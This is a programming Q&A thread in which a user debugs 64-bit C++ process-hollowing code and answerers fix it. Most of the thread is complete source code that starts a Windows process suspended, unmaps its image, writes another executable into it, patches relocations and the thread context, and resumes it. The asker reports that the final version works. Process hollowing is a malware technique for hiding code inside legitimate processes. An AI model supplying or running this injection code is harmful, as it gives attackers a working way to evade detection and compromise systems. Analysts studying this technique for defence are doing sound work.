# Issues with Win32 ReadProcessMemory API

Tags: c++, c, winapi

I am writing a simple application to perform process hollowing which starts a 64 bit process, the application then uses NtQueryInformationProcess to get the PebBaseAddress and I try to get a hold of the 6th member of the Peb which is the BaseAddressofImage but I get this weird address being returned which is not correct:

pebImageBaseOffset is: 0000000000000000

Here is the code that I am using:

```
#include <iostream>
#include <Windows.h>
#include <winternl.h>
#include <tchar.h>
#pragma comment(lib, "ntdll")

int main()
{
    // create destination process - this is the process to be hollowed out
    LPSTARTUPINFOA si = new STARTUPINFOA();
    LPPROCESS_INFORMATION pi = new PROCESS_INFORMATION();
    PROCESS_BASIC_INFORMATION *pbi = new PROCESS_BASIC_INFORMATION();
    DWORD returnLenght = 0;
    CreateProcessA(NULL, (LPSTR)"c:\\windows\\system32\\calc.exe", NULL, NULL, TRUE, CREATE_SUSPENDED, NULL, NULL, si, pi);
    HANDLE destProcess = pi->hProcess;

    // get destination imageBase offset address from the PEB
    NtQueryInformationProcess(destProcess, ProcessBasicInformation, pbi, sizeof(PROCESS_BASIC_INFORMATION), &returnLenght);
    DWORD pebImageBaseOffset = (DWORD)pbi->PebBaseAddress + 8;

    // get destination imageBaseAddress
    LPVOID destImageBase = 0;
    SIZE_T bytesRead = NULL;
    ReadProcessMemory(destProcess, (LPCVOID)pebImageBaseOffset, &destImageBase, 4, &bytesRead);
    std::cout << "pebImageBaseOffset is: " << destImageBase << std::endl;
    std::cin.get();
}
```

This code is compiled and linked as a 64 bit PE executable file. Where am I going wrong here ? I know for a fact that the actual base address of the calc.exe image was 0x7ff7ab750000.

If this code is compiled and linked as a 32 bit PE executable file, it works, so I think my issue relates to pointer sizes and pointer arithmetic but I am not a very experiences C++ programmer and I must have overseen something.

I tried copying the following code but wasn't able to get it to work with 64 bit executables probably because of pointer truncation related issues:

```
#include <iostream>
#include <Windows.h>
#include <winternl.h>
#pragma comment(lib, "ntdll")

using NtUnmapViewOfSection = NTSTATUS(WINAPI*)(HANDLE, PVOID);

typedef struct BASE_RELOCATION_BLOCK {
    DWORD PageAddress;
    DWORD BlockSize;
} BASE_RELOCATION_BLOCK, *PBASE_RELOCATION_BLOCK;

typedef struct BASE_RELOCATION_ENTRY {
    USHORT Offset : 12;
    USHORT Type : 4;
} BASE_RELOCATION_ENTRY, *PBASE_RELOCATION_ENTRY;

int main()
{
    // create destination process - this is the process to be hollowed out
    LPSTARTUPINFOA si = new STARTUPINFOA();
    LPPROCESS_INFORMATION pi = new PROCESS_INFORMATION();
    PROCESS_BASIC_INFORMATION *pbi = new PROCESS_BASIC_INFORMATION();
    DWORD returnLenght = 0;
    CreateProcessA(NULL, (LPSTR)"c:\\windows\\syswow64\\notepad.exe", NULL, NULL, TRUE, CREATE_SUSPENDED, NULL, NULL, si, pi);
    HANDLE destProcess = pi->hProcess;

    // get destination imageBase offset address from the PEB
    NtQueryInformationProcess(destProcess, ProcessBasicInformation, pbi, sizeof(PROCESS_BASIC_INFORMATION), &returnLenght);
    DWORD pebImageBaseOffset = (DWORD)pbi->PebBaseAddress + 8; 
    
    // get destination imageBaseAddress
    LPVOID destImageBase = 0;
    SIZE_T bytesRead = NULL;
    ReadProcessMemory(destProcess, (LPCVOID)pebImageBaseOffset, &destImageBase, 4, &bytesRead);

    // read source file - this is the file that will be executed inside the hollowed process
    HANDLE sourceFile = CreateFileA("C:\\temp\\regshot.exe", GENERIC_READ,  NULL, NULL, OPEN_ALWAYS, NULL, NULL);
    DWORD sourceFileSize = GetFileSize(sourceFile, NULL);
    LPDWORD fileBytesRead = 0;
    LPVOID sourceFileBytesBuffer = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sourceFileSize);
    ReadFile(sourceFile, sourceFileBytesBuffer, sourceFileSize, NULL, NULL);
    
    // get source image size
    PIMAGE_DOS_HEADER sourceImageDosHeaders = (PIMAGE_DOS_HEADER)sourceFileBytesBuffer;
    PIMAGE_NT_HEADERS sourceImageNTHeaders = (PIMAGE_NT_HEADERS)((DWORD)sourceFileBytesBuffer + sourceImageDosHeaders->e_lfanew);
    SIZE_T sourceImageSize = sourceImageNTHeaders->OptionalHeader.SizeOfImage;

    // carve out the destination image
    NtUnmapViewOfSection myNtUnmapViewOfSection = (NtUnmapViewOfSection)(GetProcAddress(GetModuleHandleA("ntdll"), "NtUnmapViewOfSection"));
    myNtUnmapViewOfSection(destProcess, destImageBase);

    // allocate new memory in destination image for the source image
    LPVOID newDestImageBase = VirtualAllocEx(destProcess, destImageBase, sourceImageSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    destImageBase = newDestImageBase;

    // get delta between sourceImageBaseAddress and destinationImageBaseAddress
    DWORD deltaImageBase = (DWORD)destImageBase - sourceImageNTHeaders->OptionalHeader.ImageBase;

    // set sourceImageBase to destImageBase and copy the source Image headers to the destination image
    sourceImageNTHeaders->OptionalHeader.ImageBase = (DWORD)destImageBase;
    WriteProcessMemory(destProcess, newDestImageBase, sourceFileBytesBuffer, sourceImageNTHeaders->OptionalHeader.SizeOfHeaders, NULL);

    // get pointer to first source image section
    PIMAGE_SECTION_HEADER sourceImageSection = (PIMAGE_SECTION_HEADER)((DWORD)sourceFileBytesBuffer + sourceImageDosHeaders->e_lfanew + sizeof(IMAGE_NT_HEADERS32));
    PIMAGE_SECTION_HEADER sourceImageSectionOld = sourceImageSection;
    int err = GetLastError();

    // copy source image sections to destination
    for (int i = 0; i < sourceImageNTHeaders->FileHeader.NumberOfSections; i++)
    {
        PVOID destinationSectionLocation = (PVOID)((DWORD)destImageBase + sourceImageSection->VirtualAddress);
        PVOID sourceSectionLocation = (PVOID)((DWORD)sourceFileBytesBuffer + sourceImageSection->PointerToRawData);
        WriteProcessMemory(destProcess, destinationSectionLocation, sourceSectionLocation, sourceImageSection->SizeOfRawData, NULL);
        sourceImageSection++;
    }

    // get address of the relocation table
    IMAGE_DATA_DIRECTORY relocationTable = sourceImageNTHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC];
    
    // patch the binary with relocations
    sourceImageSection = sourceImageSectionOld;
    for (int i = 0; i < sourceImageNTHeaders->FileHeader.NumberOfSections; i++)
    {
        BYTE* relocSectionName = (BYTE*)".reloc";
        if (memcmp(sourceImageSection->Name, relocSectionName, 5) != 0) 
        {
            sourceImageSection++;
            continue;
        }

        DWORD sourceRelocationTableRaw = sourceImageSection->PointerToRawData;
        DWORD relocationOffset = 0;

        while (relocationOffset < relocationTable.Size) {
            PBASE_RELOCATION_BLOCK relocationBlock = (PBASE_RELOCATION_BLOCK)((DWORD)sourceFileBytesBuffer + sourceRelocationTableRaw + relocationOffset);
            relocationOffset += sizeof(BASE_RELOCATION_BLOCK);
            DWORD relocationEntryCount = (relocationBlock->BlockSize - sizeof(BASE_RELOCATION_BLOCK)) / sizeof(BASE_RELOCATION_ENTRY);
            PBASE_RELOCATION_ENTRY relocationEntries = (PBASE_RELOCATION_ENTRY)((DWORD)sourceFileBytesBuffer + sourceRelocationTableRaw + relocationOffset);

            for (DWORD y = 0; y < relocationEntryCount; y++)
            {
                relocationOffset += sizeof(BASE_RELOCATION_ENTRY);

                if (relocationEntries[y].Type == 0)
                {
                    continue;
                }

                DWORD patchAddress = relocationBlock->PageAddress + relocationEntries[y].Offset;
                DWORD patchedBuffer = 0;
                ReadProcessMemory(destProcess,(LPCVOID)((DWORD)destImageBase + patchAddress), &patchedBuffer, sizeof(DWORD), &bytesRead);
                patchedBuffer += deltaImageBase;

                WriteProcessMemory(destProcess, (PVOID)((DWORD)destImageBase + patchAddress), &patchedBuffer, sizeof(DWORD), fileBytesRead);
                int a = GetLastError();
            }
        }
    }

    // get context of the dest process thread
    LPCONTEXT context = new CONTEXT();
    context->ContextFlags = CONTEXT_INTEGER;
    GetThreadContext(pi->hThread, context);

    // update dest image entry point to the new entry point of the source image and resume dest image thread
    DWORD patchedEntryPoint = (DWORD)destImageBase + sourceImageNTHeaders->OptionalHeader.AddressOfEntryPoint;
    context->Eax = patchedEntryPoint;
    SetThreadContext(pi->hThread, context);
    ResumeThread(pi->hThread);

    return 0;
}
```

Comment: There is absolutely no error handling. That's not a good way to learn, why your program fails. Ok, that wasn't entirely correct. There *are* two calls to `GetLastError`. But both of them return indeterminate values.

Comment: Why are you casting `PebBaseAddress` to a DWORD for a 64 bit exe?

Comment: @JonathanPotter, I tried casting to an unsigned long long instead but that didn't really help...

Comment: You have other casts in your code as well which make no sense in 64 bit. Copying code from somewhere is fine but you should go through it and try to understand it yourself.

Comment: First step, add error checking

Comment: @pussinboots1992 memory address size on 64 bit arch is DWORD64 or LONG_PTR

Answer (score 1, accepted):

The first code example: When running under `x64`, please use `ULONG_PTR` instead, as long as the pointer is not truncated. And the offset need be changed to 16(`ImageBaseAddress` is at PEB+8 in x86 and at PEB+16 in x64).

In `ReadProcessMemory`, you need to change 4 to 8 which is the size of `ULONG_PTR` under x64.

Under x64,

```
#include <iostream>
#include <Windows.h>
#include <winternl.h>
#include <tchar.h>
#pragma comment(lib, "ntdll")

int main()
{
    // create destination process - this is the process to be hollowed out
    LPSTARTUPINFOA si = new STARTUPINFOA();
    LPPROCESS_INFORMATION pi = new PROCESS_INFORMATION();
    PROCESS_BASIC_INFORMATION* pbi = new PROCESS_BASIC_INFORMATION();
    ULONG returnLenght = 0;
    CreateProcessA(NULL, (LPSTR)"c:\\windows\\system32\\calc.exe", NULL, NULL, TRUE, CREATE_SUSPENDED, NULL, NULL, si, pi);
    HANDLE destProcess = pi->hProcess;

    // get destination imageBase offset address from the PEB
    NtQueryInformationProcess(destProcess, ProcessBasicInformation, pbi, sizeof(PROCESS_BASIC_INFORMATION), &returnLenght);
    ULONG_PTR  pebImageBaseOffset = (ULONG_PTR)pbi->PebBaseAddress + 16;

    // get destination imageBaseAddress
    LPVOID destImageBase = 0;
    SIZE_T bytesRead = NULL;
    ReadProcessMemory(destProcess, (LPCVOID)pebImageBaseOffset, &destImageBase, 8, &bytesRead);
    std::cout << "pebImageBaseOffset is: " << destImageBase << std::endl;
    std::cin.get();
}
```

The second code example. Under x64, In addition to the modifications mentioned above, you also need to change `IMAGE_NT_HEADERS32` to `_IMAGE_NT_HEADERS64`.

```
#include <iostream>
#include <Windows.h>
#include <winternl.h>
#pragma comment(lib, "ntdll")

using NtUnmapViewOfSection = NTSTATUS(WINAPI*)(HANDLE, PVOID);

typedef struct BASE_RELOCATION_BLOCK {
    DWORD PageAddress;
    DWORD BlockSize;
} BASE_RELOCATION_BLOCK, * PBASE_RELOCATION_BLOCK;

typedef struct BASE_RELOCATION_ENTRY {
    USHORT Offset : 12;
    USHORT Type : 4;
} BASE_RELOCATION_ENTRY, * PBASE_RELOCATION_ENTRY;


int main()
{
    // create destination process - this is the process to be hollowed out
    LPSTARTUPINFOA si = new STARTUPINFOA();
    LPPROCESS_INFORMATION pi = new PROCESS_INFORMATION();
    PROCESS_BASIC_INFORMATION* pbi = new PROCESS_BASIC_INFORMATION();
    ULONG returnLenght = 0;
    CreateProcessA(NULL, (LPSTR)"c:\\windows\\syswow64\\notepad.exe", NULL, NULL, TRUE, CREATE_SUSPENDED, NULL, NULL, si, pi);
    HANDLE destProcess = pi->hProcess;
    
    // get destination imageBase offset address from the PEB
    NtQueryInformationProcess(destProcess, ProcessBasicInformation, pbi, sizeof(PROCESS_BASIC_INFORMATION), &returnLenght);
    ULONG_PTR pebImageBaseOffset = (ULONG_PTR)pbi->PebBaseAddress + 16;
  
    // get destination imageBaseAddress
    LPVOID destImageBase = 0;
    SIZE_T bytesRead = NULL;
    ReadProcessMemory(destProcess, (LPCVOID)pebImageBaseOffset, &destImageBase, sizeof(ULONG_PTR), &bytesRead);

    // read source file - this is the file that will be executed inside the hollowed process
    HANDLE sourceFile = CreateFileA("c:\\windows\\system32\\calc.exe", GENERIC_READ, NULL, NULL, OPEN_ALWAYS, NULL, NULL);
    ULONG_PTR sourceFileSize = GetFileSize(sourceFile, NULL);
    SIZE_T fileBytesRead = 0;
    LPVOID sourceFileBytesBuffer = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sourceFileSize);
    ReadFile(sourceFile, sourceFileBytesBuffer, sourceFileSize, NULL, NULL);

    // get source image size
    PIMAGE_DOS_HEADER sourceImageDosHeaders = (PIMAGE_DOS_HEADER)sourceFileBytesBuffer;
    PIMAGE_NT_HEADERS sourceImageNTHeaders = (PIMAGE_NT_HEADERS)((ULONG_PTR)sourceFileBytesBuffer + sourceImageDosHeaders->e_lfanew);
    SIZE_T sourceImageSize = sourceImageNTHeaders->OptionalHeader.SizeOfImage;

    // carve out the destination image
    NtUnmapViewOfSection myNtUnmapViewOfSection = (NtUnmapViewOfSection)(GetProcAddress(GetModuleHandleA("ntdll"), "NtUnmapViewOfSection"));
    myNtUnmapViewOfSection(destProcess, destImageBase);

    // allocate new memory in destination image for the source image
    LPVOID newDestImageBase = VirtualAllocEx(destProcess, destImageBase, sourceImageSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    destImageBase = newDestImageBase;

    // get delta between sourceImageBaseAddress and destinationImageBaseAddress
    ULONG_PTR deltaImageBase = (ULONG_PTR)destImageBase - sourceImageNTHeaders->OptionalHeader.ImageBase;

    // set sourceImageBase to destImageBase and copy the source Image headers to the destination image
    sourceImageNTHeaders->OptionalHeader.ImageBase = (ULONG_PTR)destImageBase;
    WriteProcessMemory(destProcess, newDestImageBase, sourceFileBytesBuffer, sourceImageNTHeaders->OptionalHeader.SizeOfHeaders, NULL);
    // get pointer to first source image section
    PIMAGE_SECTION_HEADER sourceImageSection = (PIMAGE_SECTION_HEADER)((ULONG_PTR)sourceFileBytesBuffer + sourceImageDosHeaders->e_lfanew + sizeof(_IMAGE_NT_HEADERS64)); //IMAGE_NT_HEADERS32
    PIMAGE_SECTION_HEADER sourceImageSectionOld = sourceImageSection;

    // copy source image sections to destination
    for (int i = 0; i < sourceImageNTHeaders->FileHeader.NumberOfSections; i++)
    {
        PVOID destinationSectionLocation = (PVOID)((ULONG_PTR)destImageBase + sourceImageSection->VirtualAddress);
        PVOID sourceSectionLocation = (PVOID)((ULONG_PTR)sourceFileBytesBuffer + sourceImageSection->PointerToRawData);
        WriteProcessMemory(destProcess, destinationSectionLocation, sourceSectionLocation, sourceImageSection->SizeOfRawData, NULL);
        sourceImageSection++;
    }

    // get address of the relocation table
    IMAGE_DATA_DIRECTORY relocationTable = sourceImageNTHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC];

    // patch the binary with relocations
    sourceImageSection = sourceImageSectionOld;
    for (int i = 0; i < sourceImageNTHeaders->FileHeader.NumberOfSections; i++)
    {
        BYTE* relocSectionName = (BYTE*)".reloc";
        if (memcmp(sourceImageSection->Name, relocSectionName, 5) != 0)
        {
            sourceImageSection++;
            continue;
        }

        ULONG_PTR sourceRelocationTableRaw = sourceImageSection->PointerToRawData;
        ULONG_PTR relocationOffset = 0;

        while (relocationOffset < relocationTable.Size) {
            PBASE_RELOCATION_BLOCK relocationBlock = (PBASE_RELOCATION_BLOCK)((ULONG_PTR)sourceFileBytesBuffer + sourceRelocationTableRaw + relocationOffset);
            relocationOffset += sizeof(BASE_RELOCATION_BLOCK);
            ULONG_PTR relocationEntryCount = (relocationBlock->BlockSize - sizeof(BASE_RELOCATION_BLOCK)) / sizeof(BASE_RELOCATION_ENTRY);
            PBASE_RELOCATION_ENTRY relocationEntries = (PBASE_RELOCATION_ENTRY)((ULONG_PTR)sourceFileBytesBuffer + sourceRelocationTableRaw + relocationOffset);

            for (ULONG_PTR y = 0; y < relocationEntryCount; y++)
            {
                relocationOffset += sizeof(BASE_RELOCATION_ENTRY);

                if (relocationEntries[y].Type == 0)
                {
                    continue;
                }

                ULONG_PTR patchAddress = relocationBlock->PageAddress + relocationEntries[y].Offset;
                ULONG_PTR patchedBuffer = 0;
                ReadProcessMemory(destProcess, (LPCVOID)((ULONG_PTR)destImageBase + patchAddress), &patchedBuffer, sizeof(ULONG_PTR), &bytesRead);
                patchedBuffer += deltaImageBase;

                WriteProcessMemory(destProcess, (PVOID)((ULONG_PTR)destImageBase + patchAddress), &patchedBuffer, sizeof(ULONG_PTR), &fileBytesRead);
            }
        }
    }
    

    return 0;
}
```

Comment: This is correct although you are missing the end of the code...

Check my code bellow and edit yours since it has more up-votes, thanks for your help !

Comment: I cannot believe that you write another function for 64 bit! Use IMAGE_NT_HEADERS instead of IMAGE_NT_HEADERS32 or IMAGE_NT_HEADERS64 and you can easily write ONE function which works on 32 AND 64 bit. If there is still something which is different between 32 and 64 use a #ifdef WIN64 ... #else ... #endif. And instead of changing a hard-coded 4 into an 8 you can use sizeof(ULONG_PTR) and it will work for both bitness.

Answer (score 0):

I followed @Strive Sun - MSFT answer above and got the code shown bellow working. I have noticed however that the code only works when certain executable's are used, for instance if I replace calc.exe with cmd.exe from C:\Windows\System32\ it fails, when I run the file utility on the 3 files, it does seem like cmd.exe is slightly different from the others which may explain why it fails, if anyone reading this knows exactly why these two files are incompatible please let me know.

I suspect it relates to [this](https://github.com/m0n0ph1/Process-Hollowing):

```
cmd.exe: PE32+ executable (console) x86-64, for MS Windows
calc.exe: PE32+ executable (GUI) x86-64, for MS Windows
cleanmgr.exe: PE32+ executable (GUI) x86-64, for MS Windows
```

"...To maximize compatibility, the subsystem of the source image should be set to windows. The compiler should use the static version of the run-time library to remove dependence to the Visual C++ runtime DLL. This can be achieved by using the /MT or /MTd compiler options. Either the preferred base address (assuming it has one) of the source image must match that of the destination image, or the source must contain a relocation table and the image needs to be rebased to the address of the destination. For compatibility reasons the rebasing route is preferred. The /DYNAMICBASE or /FIXED:NO linker options can be used to generate a relocation table..."

Here is the code which I ended up using, but @strive sun's solution is basically what I ended up doing too.

```
#include <iostream>
#include <Windows.h>
#include <winternl.h>
#include <tchar.h>
#include "ntstatus.h"
#pragma comment(lib, "ntdll")

using NtUnmapViewOfSection = NTSTATUS(WINAPI*)(HANDLE, PVOID);

typedef NTSTATUS(NTAPI *pfnNtQueryInformationProcess)(
    IN  HANDLE ProcessHandle,
    IN  PROCESSINFOCLASS ProcessInformationClass,
    OUT PVOID ProcessInformation,
    IN  ULONG ProcessInformationLength,
    OUT PULONG ReturnLength    OPTIONAL
    );

typedef struct BASE_RELOCATION_BLOCK {
    DWORD PageAddress;
    DWORD BlockSize;
} BASE_RELOCATION_BLOCK, *PBASE_RELOCATION_BLOCK;

typedef struct BASE_RELOCATION_ENTRY {
    USHORT Offset : 12;
    USHORT Type : 4;
} BASE_RELOCATION_ENTRY, *PBASE_RELOCATION_ENTRY;

UINT_PTR GetPEBLocation(HANDLE hProcess)
{
    ULONG RequiredLen = 0;
    UINT_PTR PebAddress = NULL;
    PROCESS_BASIC_INFORMATION myProcessBasicInformation[5] = { 0 };

    if (NtQueryInformationProcess(hProcess, ProcessBasicInformation, myProcessBasicInformation, sizeof(PROCESS_BASIC_INFORMATION), &RequiredLen) == STATUS_SUCCESS)
    {
        PebAddress = (UINT_PTR)myProcessBasicInformation->PebBaseAddress + 16;
    }
    else
    {
        if (NtQueryInformationProcess(hProcess, ProcessBasicInformation, myProcessBasicInformation, RequiredLen, &RequiredLen) == STATUS_SUCCESS)
        {
            PebAddress = (UINT_PTR)myProcessBasicInformation->PebBaseAddress + 16;
        }
    }

    return PebAddress;
}

int main()
{
    // create destination process - this is the process to be hollowed out
    LPSTARTUPINFOA si = new STARTUPINFOA();
    LPPROCESS_INFORMATION pi = new PROCESS_INFORMATION();
    PROCESS_BASIC_INFORMATION *pbi = new PROCESS_BASIC_INFORMATION();
    CreateProcessA(NULL, (LPSTR)"c:\\windows\\system32\\cleanmgr.exe", NULL, NULL, TRUE, CREATE_SUSPENDED, NULL, NULL, si, pi);
    HANDLE destProcess = pi->hProcess;
    LPVOID destProcessImageBase = (LPVOID)GetPEBLocation(destProcess);
    std::cout << "PEB image base address is at: " << destProcessImageBase << std::endl;
    
    // get destination imageBaseAddress
    LPVOID destImageBase = NULL;
    SIZE_T bytesRead = NULL;
    ReadProcessMemory(destProcess, (LPVOID)destProcessImageBase, &destImageBase, 8, &bytesRead);
    std::cout << "Image base address is at: " << destImageBase << std::endl;


    // read source file - this is the file that will be executed inside the hollowed process
    HANDLE sourceFile = CreateFileA("c:\\windows\\system32\\calc.exe", GENERIC_READ, NULL, NULL, OPEN_ALWAYS, NULL, NULL);
    SIZE_T sourceFileSize = GetFileSize(sourceFile, NULL);
    LPVOID sourceFileBytesBuffer = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sourceFileSize);
    ReadFile(sourceFile, sourceFileBytesBuffer, sourceFileSize, NULL, NULL);

    // get source image size
    PIMAGE_DOS_HEADER sourceImageDosHeaders = (PIMAGE_DOS_HEADER)sourceFileBytesBuffer;
    PIMAGE_NT_HEADERS sourceImageNTHeaders = (PIMAGE_NT_HEADERS)((ULONGLONG)sourceFileBytesBuffer + sourceImageDosHeaders->e_lfanew);
    SIZE_T sourceImageSize = sourceImageNTHeaders->OptionalHeader.SizeOfImage;
    std::cout << "LPVOID is: " << sizeof(LPVOID) << " DWORD is " << sizeof(DWORD) << " ULONGLONG is " << sizeof(ULONGLONG) << std::endl;
    // carve out the destination image
    NtUnmapViewOfSection myNtUnmapViewOfSection = (NtUnmapViewOfSection)(GetProcAddress(GetModuleHandleA("ntdll"), "NtUnmapViewOfSection"));
    myNtUnmapViewOfSection(destProcess, destImageBase);

    // allocate new memory in destination image for the source image
    LPVOID newDestImageBase = VirtualAllocEx(destProcess, destImageBase, sourceImageSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    destImageBase = newDestImageBase;

    // get delta between sourceImageBaseAddress and destinationImageBaseAddress
    ULONGLONG deltaImageBase = (ULONGLONG)destImageBase - sourceImageNTHeaders->OptionalHeader.ImageBase;

    // set sourceImageBase to destImageBase and copy the source Image headers to the destination image
    sourceImageNTHeaders->OptionalHeader.ImageBase = (ULONGLONG)destImageBase;
    WriteProcessMemory(destProcess, newDestImageBase, sourceFileBytesBuffer, sourceImageNTHeaders->OptionalHeader.SizeOfHeaders, NULL);

    // get pointer to first source image section
    PIMAGE_SECTION_HEADER sourceImageSection = (PIMAGE_SECTION_HEADER)((ULONGLONG)sourceFileBytesBuffer + sourceImageDosHeaders->e_lfanew + sizeof(IMAGE_NT_HEADERS64));
    PIMAGE_SECTION_HEADER sourceImageSectionOld = sourceImageSection;
    std::cout << "LPDWORD is: " << sizeof(LPDWORD) << std::endl;
    std::cout << "SIZE_T is: " << sizeof(SIZE_T) << std::endl;
    // copy source image sections to destination
    for (int i = 0; i < sourceImageNTHeaders->FileHeader.NumberOfSections; i++)
    {
        PVOID destinationSectionLocation = (PVOID)((ULONGLONG)destImageBase + sourceImageSection->VirtualAddress);
        PVOID sourceSectionLocation = (PVOID)((ULONGLONG)sourceFileBytesBuffer + sourceImageSection->PointerToRawData);
        WriteProcessMemory(destProcess, destinationSectionLocation, sourceSectionLocation, sourceImageSection->SizeOfRawData, NULL);
        sourceImageSection++;
    }

    // get address of the relocation table
    IMAGE_DATA_DIRECTORY relocationTable = sourceImageNTHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC];




    // patch the binary with relocations
    sourceImageSection = sourceImageSectionOld;
    for (int i = 0; i < sourceImageNTHeaders->FileHeader.NumberOfSections; i++)
    {
        BYTE* relocSectionName = (BYTE*)".reloc";
        if (memcmp(sourceImageSection->Name, relocSectionName, 5) != 0)
        {
            sourceImageSection++;
            continue;
        }

        ULONGLONG sourceRelocationTableRaw = sourceImageSection->PointerToRawData;
        DWORD relocationOffset = 0;

        while (relocationOffset < relocationTable.Size) {
            PBASE_RELOCATION_BLOCK relocationBlock = (PBASE_RELOCATION_BLOCK)((ULONGLONG)sourceFileBytesBuffer + sourceRelocationTableRaw + relocationOffset);
            relocationOffset += sizeof(BASE_RELOCATION_BLOCK);
            DWORD relocationEntryCount = (relocationBlock->BlockSize - sizeof(BASE_RELOCATION_BLOCK)) / sizeof(BASE_RELOCATION_ENTRY);
            PBASE_RELOCATION_ENTRY relocationEntries = (PBASE_RELOCATION_ENTRY)((ULONGLONG)sourceFileBytesBuffer + sourceRelocationTableRaw + relocationOffset);

            for (DWORD y = 0; y < relocationEntryCount; y++)
            {
                relocationOffset += sizeof(BASE_RELOCATION_ENTRY);

                if (relocationEntries[y].Type == 0)
                {
                    continue;
                }

                ULONGLONG patchAddress = relocationBlock->PageAddress + relocationEntries[y].Offset;
                ULONGLONG patchedBuffer = 0;
                ReadProcessMemory(destProcess, (LPCVOID)((ULONGLONG)destImageBase + patchAddress), &patchedBuffer, sizeof(ULONGLONG), &bytesRead);
                patchedBuffer += deltaImageBase;

                WriteProcessMemory(destProcess, (PVOID)((ULONGLONG)destImageBase + patchAddress), &patchedBuffer, sizeof(ULONGLONG),NULL);
                int a = GetLastError();
            }
        }
    }
    // get context of the dest process thread
    LPCONTEXT context = new CONTEXT();
    context->ContextFlags = CONTEXT_INTEGER;
    GetThreadContext(pi->hThread, context);

    // update dest image entry point to the new entry point of the source image and resume dest image thread
    ULONGLONG patchedEntryPoint = (ULONGLONG)destImageBase + sourceImageNTHeaders->OptionalHeader.AddressOfEntryPoint;
    context->Rcx = patchedEntryPoint;
    SetThreadContext(pi->hThread, context);
    ResumeThread(pi->hThread);
    
    std::cin.get();
    return 0;
}
```

Comment: Hi, sorry to resume an old thread. In this case won't `SetThreadContext` fail? I am trying something like this as well but I am unable to set volatile registers on x64.

Comment: This code did work for me on x64/Windows 10, I was able to hollow out a process and didn't get the issues you mention...are you getting errors ? If not, try using different binaries...I remember I had issues which I believe were related to the target subsystem.

Comment: I am actually trying with the same executables you are using, but it is more than definitely possible that I might be doing something else wrong. I was just concerned regarding this other thread https://stackoverflow.com/questions/25004311/setthreadcontext-x64-volatile-registers